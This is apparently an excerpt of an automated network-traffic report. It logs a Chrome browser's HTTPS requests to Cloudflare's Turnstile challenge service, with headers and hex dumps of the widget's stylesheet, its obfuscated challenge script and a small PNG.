                                                          2025-01-09 20:12:16 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                          Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                          Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                          Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                          Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                          Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.449754104.18.95.414436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:16 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ff714c8fb27c325&lang=auto HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/pzzoe/0x4AAAAAAA3bgXiDXCFJKrv3/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:16 UTC331INHTTP/1.1 200 OK
                                                          Date: Thu, 09 Jan 2025 20:12:16 GMT
                                                          Content-Type: application/javascript; charset=UTF-8
                                                          Content-Length: 114993
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          Server: cloudflare
                                                          CF-RAY: 8ff714cd19da6a53-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-09 20:12:16 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65
                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32
                                                          Data Ascii: 0containing%20a%20Cloudflare%20security%20challenge","turnstile_success":"Success%21","turnstile_feedback_description":"Send%20Feedback","turnstile_overrun_description":"Stuck%20here%3F","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%2
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 2c 66 59 2c 67 61 2c 67 67 2c 67 68 2c 67 69 2c 67 73 2c 67 44 2c 67 48 2c 65 53 2c 65 54 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 34 36 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 39 31 29 29 2f 32 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 35 34 34 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 30 36 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 34 38 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 38 31 34 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 33 33 38 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 30
                                                          Data Ascii: ,fY,ga,gg,gh,gi,gs,gD,gH,eS,eT){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1446))/1+-parseInt(gI(591))/2*(parseInt(gI(544))/3)+-parseInt(gI(1106))/4+-parseInt(gI(1548))/5+parseInt(gI(814))/6+parseInt(gI(338))/7+parseInt(gI(10
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 69 3d 3d 68 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 67 4b 28 31 31 37 39 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 3d 3d 6e 75 6c 6c 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 67 4c 29 7b 72 65 74 75 72 6e 20 67 4c 3d 62 2c 67 4c 28 31 33 39 34 29 5b 67 4c 28 39 32 39 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 67 4d 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4f 29 7b 69 66 28 67 4d 3d 67 4b 2c 69 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d 30 2c 4a 3d 30 3b 4a 3c 69 5b 67 4d
                                                          Data Ascii: i==h}},e=String[gK(1179)],f={'h':function(h){return h==null?'':f.g(h,6,function(i,gL){return gL=b,gL(1394)[gL(929)](i)})},'g':function(i,j,o,gM,s,x,B,C,D,E,F,G,H,I,J,K,L,M,O){if(gM=gK,i==null)return'';for(x={},B={},C='',D=2,E=3,F=2,G=[],H=0,I=0,J=0;J<i[gM
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 33 38 32 29 5d 28 4d 2c 31 29 2c 64 5b 67 4d 28 31 33 34 37 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 67 4d 28 37 34 39 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 64 5b 67 4d 28 36 33 33 29 5d 28 73 2c 46 29 3b 48 3d 48 3c 3c 31 7c 4d 2c 64 5b 67 4d 28 37 35 36 29 5d 28 49 2c 64 5b 67 4d 28 34 34 30 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 67 4d 28 37 34 39 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 67 4d 28 37 32 34 29 5d 28 30 29 2c 73 3d 30 3b 31 36 3e 73 3b 48 3d 64 5b 67 4d 28 31 36 31 38 29 5d 28 48 2c 31 29 7c 64 5b 67 4d 28 31 33 38 32 29 5d 28 4d 2c 31 29 2c 49 3d 3d 6a 2d
                                                          Data Ascii: 382)](M,1),d[gM(1347)](I,j-1)?(I=0,G[gM(749)](o(H)),H=0):I++,M>>=1,s++);}else{for(M=1,s=0;d[gM(633)](s,F);H=H<<1|M,d[gM(756)](I,d[gM(440)](j,1))?(I=0,G[gM(749)](o(H)),H=0):I++,M=0,s++);for(M=C[gM(724)](0),s=0;16>s;H=d[gM(1618)](H,1)|d[gM(1382)](M,1),I==j-
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 46 2a 28 30 3c 4c 3f 31 3a 30 29 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 50 28 39 32 36 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 67 50 28 31 35 39 38 29 5d 28 46 2c 4b 29 3b 4c 3d 47 26 48 2c 48 3e 3e 3d 31 2c 64 5b 67 50 28 37 35 36 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 67 50 28 31 32 30 34 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 67 50 28 31 35 39 34 29 5d 28 30 2c 4c 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4d 3d 64 5b 67 50 28 31 32 30 34 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 50 28 39 32 36 29 5d 28 32 2c 31
                                                          Data Ascii: &(H=j,G=o(I++)),J|=F*(0<L?1:0),F<<=1);switch(J){case 0:for(J=0,K=Math[gP(926)](2,8),F=1;d[gP(1598)](F,K);L=G&H,H>>=1,d[gP(756)](0,H)&&(H=j,G=d[gP(1204)](o,I++)),J|=(d[gP(1594)](0,L)?1:0)*F,F<<=1);M=d[gP(1204)](e,J);break;case 1:for(J=0,K=Math[gP(926)](2,1
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 67 4a 28 36 37 30 29 29 2c 65 4d 5b 67 4a 28 35 31 39 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4a 28 31 36 37 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 52 29 7b 69 66 28 68 52 3d 67 4a 2c 65 4d 5b 68 52 28 35 31 39 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 68 52 28 35 31 39 29 5d 3d 21 21 5b 5d 7d 2c 66 72 3d 30 2c 65 4e 5b 67 4a 28 36 37 38 29 5d 3d 3d 3d 67 4a 28 31 31 38 34 29 3f 65 4e 5b 67 4a 28 35 37 33 29 5d 28 67 4a 28 31 35 37 36 29 2c 66 75 6e 63 74 69 6f 6e 28 69 32 2c 63 29 7b 69 32 3d 67 4a 2c 63 3d 7b 27 6d 4b 7a 42 57 27 3a 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 66 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 66 29 7d 7d 2c 63 5b 69 32 28 39 33 37 29 5d 28 73 65 74 54 69 6d 65 6f 75 74 2c 66 75 2c 30 29 7d 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 2c 30
                                                          Data Ascii: gJ(670)),eM[gJ(519)]=![],eM[gJ(1672)]=function(hR){if(hR=gJ,eM[hR(519)])return;eM[hR(519)]=!![]},fr=0,eN[gJ(678)]===gJ(1184)?eN[gJ(573)](gJ(1576),function(i2,c){i2=gJ,c={'mKzBW':function(d,e,f){return d(e,f)}},c[i2(937)](setTimeout,fu,0)}):setTimeout(fu,0
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 5d 28 48 2c 47 5b 69 61 28 36 37 31 29 5d 29 3b 6f 5b 69 61 28 31 36 32 37 29 5d 28 47 5b 48 5d 2c 47 5b 6f 5b 69 61 28 31 30 32 34 29 5d 28 48 2c 31 29 5d 29 3f 47 5b 69 61 28 31 30 38 31 29 5d 28 6f 5b 69 61 28 35 34 31 29 5d 28 48 2c 31 29 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 69 39 28 31 36 39 33 29 5d 5b 69 39 28 39 39 30 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 69 39 28 36 37 31 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 66 7a 28 67 2c 68 2c 44 29 2c 42 28 45 29 3f 28 46 3d 6f 5b 69 39 28 31 36 32 37 29 5d 28 27 73 27 2c 45 29 26 26 21 67 5b 69 39 28 38 33 33 29 5d 28 68 5b 44 5d 29 2c 69 39 28 31 33 31 37 29 3d 3d 3d 69 2b 44 3f 73 28 69 2b 44
                                                          Data Ascii: ](H,G[ia(671)]);o[ia(1627)](G[H],G[o[ia(1024)](H,1)])?G[ia(1081)](o[ia(541)](H,1),1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[i9(1693)][i9(990)](B),C=0;C<x[i9(671)];D=x[C],E=fz(g,h,D),B(E)?(F=o[i9(1627)]('s',E)&&!g[i9(833)](h[D]),i9(1317)===i+D?s(i+D
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 5d 3d 69 65 28 39 39 35 29 2c 6a 3d 69 2c 67 5b 69 65 28 35 37 33 29 5d 28 65 5b 69 65 28 31 30 33 30 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 69 67 2c 76 29 7b 28 69 67 3d 69 65 2c 6b 5b 69 67 28 31 32 31 35 29 5d 29 26 26 28 76 3d 7b 7d 2c 76 5b 69 67 28 33 35 36 29 5d 3d 69 67 28 31 36 30 30 29 2c 76 5b 69 67 28 31 30 31 38 29 5d 3d 6f 5b 69 67 28 36 35 30 29 5d 5b 69 67 28 31 34 33 39 29 5d 2c 76 5b 69 67 28 39 31 31 29 5d 3d 6a 5b 69 67 28 31 36 35 39 29 5d 2c 76 5b 69 67 28 35 34 38 29 5d 3d 6a 5b 69 67 28 31 37 30 30 29 5d 2c 6e 5b 69 67 28 31 32 31 35 29 5d 5b 69 67 28 31 34 36 36 29 5d 28 76 2c 27 2a 27 29 29 7d 29 29 3a 28 65 4d 5b 69 65 28 31 30 38 32 29 5d 5b 69 65 28 37 30 38 29 5d 28 29 2c 65 4d 5b 69 65 28 31 30 38 32 29 5d 5b 69 65 28 37 33 30
                                                          Data Ascii: ]=ie(995),j=i,g[ie(573)](e[ie(1030)],function(ig,v){(ig=ie,k[ig(1215)])&&(v={},v[ig(356)]=ig(1600),v[ig(1018)]=o[ig(650)][ig(1439)],v[ig(911)]=j[ig(1659)],v[ig(548)]=j[ig(1700)],n[ig(1215)][ig(1466)](v,'*'))})):(eM[ie(1082)][ie(708)](),eM[ie(1082)][ie(730
                                                          2025-01-09 20:12:16 UTC1369INData Raw: 68 28 31 33 31 30 29 5d 29 2c 6e 3d 7b 7d 2c 6e 5b 69 68 28 31 34 30 30 29 5d 3d 65 4d 5b 69 68 28 36 35 30 29 5d 5b 69 68 28 31 34 30 30 29 5d 2c 6e 5b 69 68 28 39 39 36 29 5d 3d 65 4d 5b 69 68 28 36 35 30 29 5d 5b 69 68 28 39 39 36 29 5d 2c 6e 5b 69 68 28 38 39 31 29 5d 3d 65 4d 5b 69 68 28 36 35 30 29 5d 5b 69 68 28 38 39 31 29 5d 2c 6e 5b 69 68 28 31 35 35 34 29 5d 3d 65 4d 5b 69 68 28 36 35 30 29 5d 5b 69 68 28 37 32 35 29 5d 2c 6f 3d 6e 2c 73 3d 6e 65 77 20 65 4d 5b 28 69 68 28 37 39 34 29 29 5d 28 29 2c 21 73 29 72 65 74 75 72 6e 3b 78 3d 69 68 28 39 31 30 29 2c 73 5b 69 68 28 31 32 31 36 29 5d 28 78 2c 6d 2c 21 21 5b 5d 29 2c 73 5b 69 68 28 31 30 37 37 29 5d 3d 35 65 33 2c 73 5b 69 68 28 39 35 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 73
                                                          Data Ascii: h(1310)]),n={},n[ih(1400)]=eM[ih(650)][ih(1400)],n[ih(996)]=eM[ih(650)][ih(996)],n[ih(891)]=eM[ih(650)][ih(891)],n[ih(1554)]=eM[ih(650)][ih(725)],o=n,s=new eM[(ih(794))](),!s)return;x=ih(910),s[ih(1216)](x,m,!![]),s[ih(1077)]=5e3,s[ih(958)]=function(){},s


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.449755104.18.95.414436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:16 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/pzzoe/0x4AAAAAAA3bgXiDXCFJKrv3/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:16 UTC240INHTTP/1.1 200 OK
                                                          Date: Thu, 09 Jan 2025 20:12:16 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 61
                                                          Connection: close
                                                          cache-control: max-age=2629800, public
                                                          Server: cloudflare
                                                          CF-RAY: 8ff714cd8b568cab-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-09 20:12:16 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.449757104.18.94.414436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:17 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:17 UTC240INHTTP/1.1 200 OK
                                                          Date: Thu, 09 Jan 2025 20:12:17 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 61
                                                          Connection: close
                                                          cache-control: max-age=2629800, public
                                                          Server: cloudflare
                                                          CF-RAY: 8ff714d198db9e08-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-09 20:12:17 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.449758104.18.94.414436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:17 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ff714c8fb27c325&lang=auto HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
